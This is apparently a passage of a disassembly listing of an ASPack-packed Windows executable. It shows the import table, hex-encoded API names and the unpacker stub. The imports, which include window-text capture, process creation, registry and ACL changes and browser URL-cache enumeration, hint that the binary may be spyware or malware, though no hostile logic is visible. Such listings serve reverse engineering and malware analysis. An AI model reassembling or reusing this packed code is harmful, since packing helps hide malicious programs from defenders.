dd 6574754Dh, 4178h, 6C530264h, 706565h, 6554026Ch, 6E696D72h
dd 50657461h, 65636F72h, 7373h, 69560285h, 61757472h, 6C6C416Ch
dd 636Fh, 69560287h, 61757472h, 6572466Ch, 65h, 6956028Ch
dd 61757472h, 6575516Ch, 7972h, 72430041h, 65746165h, 636F7250h
dd 41737365h, 0
dd 69570297h, 68436564h, 6F547261h, 746C754Dh, 74794269h
dd 65h, 69570298h, 6578456Eh, 63h, 725702A2h, 46657469h
dd 656C69h, 736C02C9h, 656C7274h, 416Eh, 736C02CAh, 656C7274h
dd 576Eh, 72430047h, 65746165h, 65726854h, 6461h, 65440054h
dd 6574656Ch, 656C6946h, 41h, 65470066h, 6E695774h, 54776F64h
dd 41747865h, 0
dd 6547006Bh, 6E695774h, 52776F64h, 746365h, 69460070h
dd 6957646Eh, 776F646Eh, 41h, 65470074h, 6E695774h, 776F64h
dd 6547000Eh, 616C4374h, 614E7373h, 41656Dh, 655300C4h
dd 636F4674h, 7375h, 654700C9h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 77h, 6F4C0016h, 75436461h, 726F7372h, 41h
dd 6F4C0018h, 63496461h, 416E6Fh, 655300FEh, 6D695474h
dd 7265h, 65520002h, 74736967h, 6C437265h, 41737361h, 0
dd 654D0134h, 67617373h, 786F4265h, 41h, 65470020h, 73654D74h
dd 65676173h, 41h, 65470159h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
dd 6553015Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0
dd 7243015Eh, 65746165h, 6B736544h, 41706F74h, 0
dd 65530165h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470166h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540024h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440025h, 74617073h, 654D6863h
dd 67617373h, 4165h, 65530030h, 654D646Eh, 67617373h, 4165h
dd 737701EAh, 6E697270h, 416674h, 6F50003Dh, 75517473h
dd 654D7469h, 67617373h, 65h, 6853004Bh, 6957776Fh, 776F646Eh
dd 0
dd 7243004Fh, 65746165h, 646E6957h, 7845776Fh, 41h, 65440051h
dd 6F727473h, 6E695779h, 776F64h, 6F4D0056h, 69576576h
dd 776F646Eh, 0
dd 6544005Bh, 6E695766h, 50776F64h, 41636F72h, 0
dd 6143005Dh, 69576C6Ch, 776F646Eh, 636F7250h, 41h, 65470089h
dd 6F745374h, 624F6B63h, 7463656Ah, 0
dd 655300CAh, 436B4274h, 726F6C6Fh, 0
dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h
dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h
dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 65520171h, 65724367h, 4B657461h, 78457965h, 41h
dd 65520174h, 6F6C4367h, 654B6573h, 79h, 65520179h, 65704F67h
dd 79654B6Eh, 417845h, 65520184h, 65755167h, 61567972h
dd 4565756Ch, 4178h, 65520190h, 74655367h, 756C6156h, 41784565h
dd 0
dd 654701CAh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CDh
dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D4h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h
dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0
dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah
dd 7469h, 656D0253h, 706D636Dh, 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h, 0
dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh
dd 0
dd offset off_447000
aWininet_dll db 'WININET.DLL',0
dd offset off_447014
dd offset off_447014
aOle32_dll db 'ole32.DLL',0
align 4
dd offset off_447028
dd offset off_447028
dd offset off_447028
dd offset off_447028
aKernel32_dll_2 db 'KERNEL32.DLL',0
align 4
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
aUser32_dll_0 db 'USER32.DLL',0
align 4
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
aGdi32_dll db 'GDI32.DLL',0
align 4
dd offset off_447064
dd offset off_447064
dd offset off_447064
dd offset off_447064
dd offset off_447064
aAdvapi32_dll_1 db 'ADVAPI32.DLL',0
align 4
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
aCrtdll_dll db 'CRTDLL.DLL',0
align 4
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
align 1000h
_idata ends
; Section 5. (virtual address 00049000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00049000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_aspack segment para public 'DATA' use32
assume cs:_aspack
;org 449000h
db 90h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_449577
jmp short loc_449055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 4900001h, 0AD000000h, 0AB000000h, 809A5100h, 809AE47Ch
dd 7Ch, 3 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_449055: ; CODE XREF: start+6�j
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, ss:dword_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz loc_4494DB
lea eax, dword_44480C[ebp]
push eax
call ss:dword_444918[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, dword_444819[ebp]
push ebx
push eax
call ss:dword_444914[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, dword_444826[ebp]
push ebx
push edi
call ss:dword_444914[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 70000000h, 12190004h, 2 dup(0)
dd 10000000h, 0BA780000h, 0B0000000h, 0BCA40003h, 70000000h
dd 10540004h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75063E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_4494DB: ; CODE XREF: start+6E�j
mov eax, ss:dword_443A76[ebp]
push eax
add eax, ss:dword_444804[ebp]
pop ecx
or ecx, ecx
mov ss:dword_443EA1[ebp], eax
popa
jnz short loc_4494FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_4494FC: ; CODE XREF: start+4F1�j
push offset sub_401219
retn
start endp
; ---------------------------------------------------------------------------
aLeHd db '',8,'HD',0
aNnahd db 'AHD',0
dw 5051h
dd 491495FFh, 85890044h, 4439EDh, 4851858Dh, 0FF500044h
dd 44491C95h, 4D858900h, 8D004448h, 44485C8Dh, 0FF505100h
dd 44491495h, 0F1858900h, 8B004439h, 44484D85h, 688D8D00h
dd 51004448h, 1495FF50h, 0FF004449h, 10C483D0h, 8D306A5Fh
dd 4448729Dh, 6A575300h, 0F195FF00h, 6A004439h, 0ED95FFFFh
db 39h, 44h, 0
; =============== S U B R O U T I N E =======================================
sub_449577 proc near ; CODE XREF: start+1�p
mov ebp, [esp+0]
sub ebp, offset byte_4439AB
retn
sub_449577 endp
; ---------------------------------------------------------------------------
db 8Bh, 44h, 24h
dd 54EC8110h, 8D000003h, 5004244Ch, 3A8E8h, 248C8B00h
dd 35Ch, 5824948Bh, 51000003h, 244C8D52h, 40DE80Ch, 0C0840000h
dd 0C8830A75h, 54C481FFh, 0C3000003h, 60248C8Bh, 8D000003h
dd 51502404h, 0C244C8Dh, 5EFE8h, 75C08400h, 0FFC8830Ah
dd 354C481h, 8BC30000h, 0C4812404h, 354h, 10C2h, 4030201h
dd 8070605h, 100E0C0Ah, 201C1814h, 40383028h, 80706050h
dd 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h, 0D18B5112h, 8B956h, 39570000h, 3572044Ah
dd 0FFF8BE53h, 28BFFFFh, 8840188Ah, 890C245Ch, 8428B02h
dd 0C247C8Bh, 8108E0C1h, 0FFE7h, 8BC70B00h, 0FE03047Ah
dd 8B084289h, 47A89C7h, 0D273C13Bh, 4728B5Bh, 8B08428Bh
dd 2B10247Ch, 0B9E8D3CEh, 18h, 0FF25CF2Bh, 0D300FFFFh
dd 5FF703E8h, 5E047289h, 4C259h, 424448Bh, 824548Bh, 848189h
dd 91890000h, 88h, 8982048Dh, 8C81h, 1000500h, 8C20000h
dd 98EC8100h, 53000000h, 0D18B5655h, 0FB957h, 0AA8B0000h
dd 84h, 7C8DC033h, 0F6332C24h, 0BC8BABF3h, 0AC24h, 89EE3B00h
dd 76202454h, 8AC93315h, 5C8B380Ch, 4C8D288Ch, 4043288Ch
dd 1989C53Bh, 17B9EB72h, 89000000h, 89282474h, 72890472h
dd 24748944h, 89FF3368h, 0C71C2474h, 1102444h, 89000000h
dd 8D18244Ch, 7489086Ah, 448B1424h, 0E0D32C34h, 0FF81F803h
dd 1000000h, 24247C89h, 8E870Fh, 448B0000h, 7D892834h
dd 3C5D8B00h, 0F983C303h, 40458910h, 6C344489h, 758B4D7Ch
dd 24448B00h, 245C8B10h, 8CBA8B1Ch, 0C1000000h, 0CE8B10EEh
dd 0FF25h, 3CB2B00h, 8BD88AFBh, 89FB8AD1h, 8B1C2474h, 24748BC3h
dd 10E0C114h, 0C1C38B66h, 0ABF302E9h, 548BCA8Bh, 0E1832024h
dd 8BAAF303h, 8B24247Ch, 8B18244Ch, 83102444h, 494004C6h
dd 8304C583h, 448909F9h, 4C891024h, 74891824h, 8D0F1424h
dd 0FFFFFF62h, 0FF81h, 0F740100h, 325D5E5Fh, 0C4815BC0h
dd 98h, 8B0004C2h, 8482h, 85C93300h, 8B3B76C0h, 0AC24B4h
dd 48A0000h, 74C08431h, 88BA8B22h, 25000000h, 0FFh, 6884448Bh
dd 33870C89h, 31048AC0h, 68847C8Bh, 6884448Dh, 8B388947h
dd 8482h, 0C83B4100h, 5E5FCC72h, 5B01B05Dh, 98C481h, 4C20000h
dd 56535100h, 8B57F18Bh, 4788306h, 8B307208h, 41118A08h
dd 0C245488h, 488B0889h, 24548B08h, 8E1C10Ch, 0FFE281h
dd 0CA0B0000h, 8304508Bh, 4889F8C2h, 89CA8B08h, 0F9830450h
dd 8BD07308h, 408B0450h, 8B908h, 0CA2B0000h, 4E8BE8D3h
dd 0FE002524h, 0C13B00FFh, 968B1473h, 8Ch, 0E9C1C88Bh
dd 8ADB3310h, 0D38B111Ch, 463B3BEBh, 3B0A732Ch, 0D21B2846h
dd 0EB0AC283h, 30463B2Ch, 0BBA0773h, 0EB000000h, 34463B20h
dd 0CBA0773h, 0EB000000h, 38463B14h, 0DBA0773h, 0EB000000h
dd 3C463B08h, 0C283D21Bh, 8B0E8B0Fh, 0FA030479h, 8B047989h
dd 18B9961Ch, 2B000000h, 5FCA2BC3h, 4C8BE8D3h, 0C1034496h
dd 888E8Bh, 5B5E0000h, 5981048Bh, 575653C3h, 0D233F98Bh
dd 0B78DC033h, 268h, 0E8561689h, 25Eh, 0C7308C8Ah, 5E00443Fh
dd 1BBh, 4C68300h, 0D303E3D3h, 3AF88340h, 448BDE72h, 4F8D1024h
dd 0D1685010h, 0E8000002h, 0FFFFFD48h, 8D1C6A50h, 0A08Fh
dd 0FD3AE800h, 6A50FFFFh, 308F8D08h, 0E8000001h, 0FFFFFD2Ch
dd 8D136A50h, 1C08Fh, 0FD1EE800h, 8789FFFFh, 260h, 0F5055E5Fh
dd 5B000002h, 8B0004C2h, 8B082444h, 244C8BD1h, 2895704h
dd 8904428Dh, 440C708h, 20h, 89104289h, 0A082h, 30828900h
dd 89000001h, 1C082h, 0B9C03300h, 0BDh, 2508289h, 82890000h
dd 254h, 2588289h, 0BA8B0000h, 260h, 25C8289h, 0ABF30000h
dd 0E8AACA8Bh, 4, 8C25Fh, 30CEC81h, 8B530000h, 8D5655D9h
dd 6A57046Bh, 0E8CD8B01h, 0FFFFFC29h, 0E75C085h, 260BB8Bh
dd 0BDB90000h, 0F3000000h, 0F633AAABh, 0CD8B046Ah, 0FFFC0CE8h
dd 344488FFh, 0FE834610h, 8DED7213h, 1C0BBh, 24448D00h
dd 0CF8B5010h, 0FFFC80E8h, 75C084FFh, 5D5E5F0Bh, 0CC4815Bh
dd 0C3000003h, 0CF8BF633h, 0FFFDE4E8h, 10F883FFh, 8B8B1573h
dd 260h, 231148Ah, 0FE280D0h, 24345488h, 7560EB46h, 8B026A28h
dd 0FBB3E8CDh, 0C083FFFFh, 7EC08503h, 0F5FE814Eh, 7D000002h
dd 344C8A52h, 4C884823h, 85462434h, 0EBEA7FC0h, 11F88336h
dd 36A0E75h, 86E8CD8Bh, 83FFFFFBh, 0CEB03C0h, 0CD8B076Ah
dd 0FFFB78E8h, 0BC083FFh, 137EC085h, 2F5FE81h, 177D0000h
dd 243444C6h, 85484600h, 81ED7FC0h, 2F5FEh, 738C0F00h
dd 8DFFFFFFh, 8D242454h, 0E852104Bh, 0FFFFFBD5h, 0B75C084h
dd 5B5D5E5Fh, 30CC481h, 8DC30000h, 2F52484h, 8B8D0000h
dd 0A0h, 0FBB3E850h, 0C084FFFFh, 5E5F0B75h, 0C4815B5Dh
dd 30Ch, 248C8DC3h, 311h, 308B8D51h, 0E8000001h, 0FFFFFB91h
dd 0B75C084h, 5B5D5E5Fh, 30CC481h, 0C6C30000h, 26483h
dd 0C0330000h, 1104BC80h, 3000003h, 83400875h, 0F07208F8h
dd 83C607EBh, 264h, 60838B01h, 8D000002h, 0BE24244Ch, 2F5h
dd 1088118Ah, 754E4140h, 5D5E5FF7h, 815B01B0h, 30CC4h
dd 1E8C300h, 90000000h, 5BEE815Eh, 0C3004445h, 8B14EC83h
dd 531C2444h, 0C75655h, 0
dd 2424448Bh, 85FF3357h, 89F18BC0h, 0F10247Ch, 25B86h
dd 104E8D00h, 0FFFC7CE8h, 1003DFFh, 13730000h, 1880E8Bh
dd 47410E8Bh, 7C890E89h, 29E91024h, 3D000002h, 2D0h, 213830Fh
dd 50000h, 8BFFFFFFh, 7E083E8h, 8D03EDC1h, 0F8830250h
dd 24548907h, 94850F14h, 8D000000h, 0A08Eh, 0FC2FE800h
dd 4E8BFFFFh, 56DB3308h, 0FFFF6DE8h, 309C8AFFh, 443FABh
dd 8F9835Eh, 4E8B3272h, 41118A04h, 18245488h, 8B044E89h
dd 548B0C4Eh, 0E1C11824h, 0FFE28108h, 0B000000h, 8568BCAh
dd 89F8C283h, 0CA8B0C4Eh, 83085689h, 0CE7308F9h, 8B087E8Bh
dd 8B90C56h, 2B000000h, 0D3FB03CFh, 18B9EAh, 7E890000h
dd 81CB2B08h, 0FFFFFFE2h, 33EAD300h, 3E856C9h, 8AFFFFFFh
dd 3F8F308Ch, 8B5E0044h, 3142444h, 89C103CAh, 8A142444h
dd 26486h, 0AE9C8B00h, 268h, 0E856D233h, 0FFFFFEDAh, 0C735948Ah
dd 5E00443Fh, 0FA8BC084h, 0FF837674h, 8B717203h, 6F8D0846h
dd 8F883FDh, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B1C24h, 4468908h, 1C24448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 7E8B0846h
dd 8B90Ch, 0C82B0000h, 0EFD3C503h, 18B9h, 8468900h, 0E781CD2Bh
dd 0FFFFFFh, 8E8DEFD3h, 130h, 0FFFB14E8h, 8DC303FFh, 5BEBF81Ch
dd 8087E83h, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B2024h, 4468908h, 2024448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 468B0856h
dd 8B90Ch, 0CA2B0000h, 0E8D3D703h, 18B9h, 8568900h, 0FF25CF2Bh
dd 0D300FFFFh, 83D803E8h, 1A7303FBh, 509E8C8Bh, 85000002h
dd 8B3074DBh, 25096h, 9E948900h, 250h, 868B1BEBh, 254h
dd 250968Bh, 4B8D0000h, 588689FDh, 89000002h, 25496h, 508E8900h
dd 8B000002h, 247C8B06h, 148D4114h, 89C23B38h, 8B107316h
dd 40D12BD0h, 5088128Ah, 3B168BFFh, 8BF072C2h, 3102444h
dd 244489C7h, 0EBF88B10h, 0E8CE8B0Bh, 0FFFFFBF0h, 1C74C084h
dd 28247C3Bh, 0FDAB820Fh, 448BFFFFh, 38892C24h, 0B05D5E5Fh
dd 0C4835B01h, 8C214h, 325D5E5Fh, 0C4835BC0h, 8C214h, 0
dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h
dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h
dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h
dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h
dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h
dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h
dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh
dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch
dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h
dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 7C80ADA0h
dd 7C80B6A1h, 7C801D77h, 0
aKernel32_dll_3 db 'kernel32.dll',0
db 2 dup(0), 47h
aEtprocaddress db 'etProcAddress',0
align 10h
aGetmodulehandl db 'GetModuleHandleA',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 3 dup(0)
dd 49F80h, 49F70h, 3 dup(0)
dd 4A074h, 4A0C4h, 3 dup(0)
dd 4A081h, 4A0CCh, 3 dup(0)
dd 4A08Dh, 4A0D4h, 3 dup(0)
dd 4A097h, 4A0DCh, 3 dup(0)
dd 4A0A2h, 4A0E4h, 3 dup(0)
dd 4A0ACh, 4A0ECh, 3 dup(0)
dd 4A0B9h, 4A0F4h, 5 dup(0)
aOleaut32_dll db 'oleaut32.dll',0
aWininet_dll_0 db 'wininet.dll',0
aOle32_dll_0 db 'ole32.dll',0
aUser32_dll_1 db 'user32.dll',0
aGdi32_dll_0 db 'gdi32.dll',0
aAdvapi32_dll_2 db 'advapi32.dll',0
aCrtdll_dll_0 db 'crtdll.dll',0
dd 77124C05h, 0
aB_0 db '=B',0
align 4
dd 774FFAC3h, 0
aC db '+!C~',0
align 4
dd 77F161D1h, 0
aSwW db 'Sww',0
align 4
aIoS db 'os',0
align 4
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 57746547h
dd 6F646E69h, 78655477h, 4174h, 74654700h, 636F7453h, 6A624F6Bh
dd 746365h, 704F0000h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 74695F00h, 616Fh, 3A2h dup(0)
_aspack ends
; Section 7. (virtual address 0004C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44C000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start